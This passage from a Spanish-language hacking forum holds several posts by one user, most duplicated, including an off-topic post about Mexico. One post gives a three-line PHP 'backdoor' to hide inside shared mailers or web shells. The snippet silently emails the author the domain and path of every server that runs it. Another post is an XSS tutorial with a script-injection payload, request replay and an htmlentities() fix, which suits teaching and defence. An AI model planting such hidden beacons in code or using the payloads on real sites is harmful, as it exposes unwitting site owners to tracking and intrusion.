echo '<center>No se pudo enviar el mensaje<br>';
}
}
?>
<font size="2" color="gray">By Okol twitter: @Okoltutos | HackxCrack | Underc0de | StrikeGeek | Greetz: all my friends</font> #15
Bugs y Exploits / Re:Backdorizando un archivo PHP
Enero 15, 2013, 12:27:22 AM
habrá mil formas de hacer algo.
yo expliqué una bro.
saludos.
yo expliqué una bro.
saludos.
#16
Bugs y Exploits / Re:Backdorizando un archivo PHP
Enero 14, 2013, 10:49:49 PM
Me alegra que les haya sido útil.
Saludos.
Saludos.
#17
Bugs y Exploits / Backdorizando un archivo PHP
Enero 14, 2013, 08:54:02 PM
Hola, esperando tengan una buena noche.
Hoy explicaré como backdorizar un archivo .PHP o puede ser .html
Bueno son 3 lineas las cuales nos serán de gran utilidad.
usaremos la variable global $_SERVER y la funcion mail()
Código: php
¿Ideas?
Esto podría servir poniéndolo en algún mailer ó alguna shell y cuando el usuario entre a la shell o el mailer nos mandará un email con la ruta.
(Modificar mi email por el suyo en el primer parámetro de la función mail() ).
PD: No me hago responsable de el uso de esto. Estoy en contra de esas practicas pero... Hay que compartir y espero a más de uno le sirva.
Saludos!
Hoy explicaré como backdorizar un archivo .PHP o puede ser .html
Bueno son 3 lineas las cuales nos serán de gran utilidad.
usaremos la variable global $_SERVER y la funcion mail()
<?php
$domain = $_SERVER['SERVER_NAME'];//El dominio en el cual está nuestro archivo
$ruta = $_SERVER['PHP_SELF'];//la ruta de el archivo
mail('[email protected]', 'Nuevo dominio infectado', $domain.$ruta);//Manda un mail con la ruta
?>¿Ideas?
Esto podría servir poniéndolo en algún mailer ó alguna shell y cuando el usuario entre a la shell o el mailer nos mandará un email con la ruta.
(Modificar mi email por el suyo en el primer parámetro de la función mail() ).
PD: No me hago responsable de el uso de esto. Estoy en contra de esas practicas pero... Hay que compartir y espero a más de uno le sirva.
Saludos!
#18
Off Topic / Re:De que pais eres?
Enero 13, 2013, 01:43:30 PM
Yo soy orgullosamente méxicano, apesar de lo que digan de mi país, yo lo amo y lo amaré por siempre.
Todo comienza despertándote con un café veracruzano(el mejor del mundo según muchos).
Despues para "Desayunar" Decimos nosotros podemos comer algo como huevitos divorciados:
O puede ser unos taquitos de barbacoa:
Después de comerte un rico desayuno sales a la calle para ir a tu trabajo escuela o simplemente a pasear y te encuentras con la clase obrera trabajadora que día a día nos saca adelante aunque nosotros los hagamos menos:
Después que llegas a tu escuela ó trabajo te encuentras con demasiadas injusticias.
Corrupción
Volviendo a lo alegre de este hermoso país. Sus mujeres.
Podemos disfrutar de el mar del caribe:
Cenotes hermosos:
entre miles de cosas más que caracterizan a mi país les dejo esta frase:
¡VIVA MÉXICO CABRONES!
Todo comienza despertándote con un café veracruzano(el mejor del mundo según muchos).
Despues para "Desayunar" Decimos nosotros podemos comer algo como huevitos divorciados:
O puede ser unos taquitos de barbacoa:
Después de comerte un rico desayuno sales a la calle para ir a tu trabajo escuela o simplemente a pasear y te encuentras con la clase obrera trabajadora que día a día nos saca adelante aunque nosotros los hagamos menos:
Después que llegas a tu escuela ó trabajo te encuentras con demasiadas injusticias.
Corrupción
Volviendo a lo alegre de este hermoso país. Sus mujeres.
Podemos disfrutar de el mar del caribe:
Cenotes hermosos:
entre miles de cosas más que caracterizan a mi país les dejo esta frase:
¡VIVA MÉXICO CABRONES!
#19
Bugs y Exploits / XSS y reparacion
Enero 03, 2013, 06:05:45 PM
¿Qué es XSS?
Xss es una vulnerabilidad que permite inyectar un código html o javascript en algún formulario ya sea por GET o por POST (por GET es más peligroso).
¿Consecuencias?
Podrian hacer desde una simple alerta hasta robar la cookie de el administrador.
NOTA: para poder entender muy bien esta vulnerabilidad deberíamos saber sobre html ó javascript.
Enviar datos por GET:
Para enviar datos por el método GET es muy fácil, solo debemos poner en la variable nuestro "vector" (un vector es como decir el "Código" con el que saltará nuestra alerta o cualquier otra cosa que hagamos.
Ejemplo:
pagina.com/archivo.php?variable="><script>alert("Okol")</script>
Ya que con el método GET se muestra lo que envias en la url es más "fácil" inyectar nuestro vector.
Enviar datos por POST:
Para enviar datos con el método POST es necesario capturar lo que estamos enviando, para eso yo uso un complemento de firefox llamado Live Http Headers. Básicamente eso registra TODO lo que envías.
Lo instalamos en Complementos -> Buscamos Live http Headers.
Bien. Una vez que lo tenemos, lo abrimos y abrimos una página cualquiera y miren.
Ahora, si nosotros llenamos algun formulario por POST se mostrará así como vemos a continuación:
Salen muchas variables pero la que nos interesa es la POST, bien ahora daremos click a donde dice POST y daremos en repetir, veras que tenemos color=red ó cualquier otro color y quedaría así:
Damos a repetir y miramos la alerta:
Existen funciones en PHP que filtran diferentes caracteres, en está entrada entenderemos 2 de ellos y cual es su función.
htmlentities()
Esa función convierte todos los caracteres html.
htmlspecialchars()
Convierte los siguentes caracteres:
Código: php
Bueno mi favorito es htmlentities(), pero puedes usar el que más te guste.
¿Como aplicarlo?
tenemos nuestro formulario y nuestro PHP:
Código: php
Xss es una vulnerabilidad que permite inyectar un código html o javascript en algún formulario ya sea por GET o por POST (por GET es más peligroso).
¿Consecuencias?
Podrian hacer desde una simple alerta hasta robar la cookie de el administrador.
NOTA: para poder entender muy bien esta vulnerabilidad deberíamos saber sobre html ó javascript.
Enviar datos por GET:
Para enviar datos por el método GET es muy fácil, solo debemos poner en la variable nuestro "vector" (un vector es como decir el "Código" con el que saltará nuestra alerta o cualquier otra cosa que hagamos.
Ejemplo:
pagina.com/archivo.php?variable="><script>alert("Okol")</script>
Ya que con el método GET se muestra lo que envias en la url es más "fácil" inyectar nuestro vector.
Enviar datos por POST:
Para enviar datos con el método POST es necesario capturar lo que estamos enviando, para eso yo uso un complemento de firefox llamado Live Http Headers. Básicamente eso registra TODO lo que envías.
Lo instalamos en Complementos -> Buscamos Live http Headers.
Bien. Una vez que lo tenemos, lo abrimos y abrimos una página cualquiera y miren.
Ahora, si nosotros llenamos algun formulario por POST se mostrará así como vemos a continuación:
Salen muchas variables pero la que nos interesa es la POST, bien ahora daremos click a donde dice POST y daremos en repetir, veras que tenemos color=red ó cualquier otro color y quedaría así:
Damos a repetir y miramos la alerta:
Existen funciones en PHP que filtran diferentes caracteres, en está entrada entenderemos 2 de ellos y cual es su función.
htmlentities()
Esa función convierte todos los caracteres html.
htmlspecialchars()
Convierte los siguentes caracteres:
'&' (et) se convierte en '&'
'"' (comillas dobles) se convierte en '"' cuando ENT_NOQUOTES no está establecido.
"'" (comilla simple) se convierte en ''' (o ') sólo cuando ENT_QUOTES está establecido.
'<' (menor que) se convierte en '<'
'>' (mayor que) se convierte en '>'Bueno mi favorito es htmlentities(), pero puedes usar el que más te guste.
¿Como aplicarlo?
tenemos nuestro formulario y nuestro PHP:
<form method="POST" action="archivo.php">
<input type="text" name="lol">
<input type="submit" value="Probar">
<?php
$variable = htmlentities($_POST['lol']);
echo $variable;
?>
También podemos sustituir el htmlentities por htmlspecialchars.
Saludos.
Okol. #20
Dudas y pedidos generales / Re:Grabar escritorio Back track
Diciembre 28, 2012, 02:01:15 PM
Tambien te puedo recomendar: Xvidcap es muy bueno.
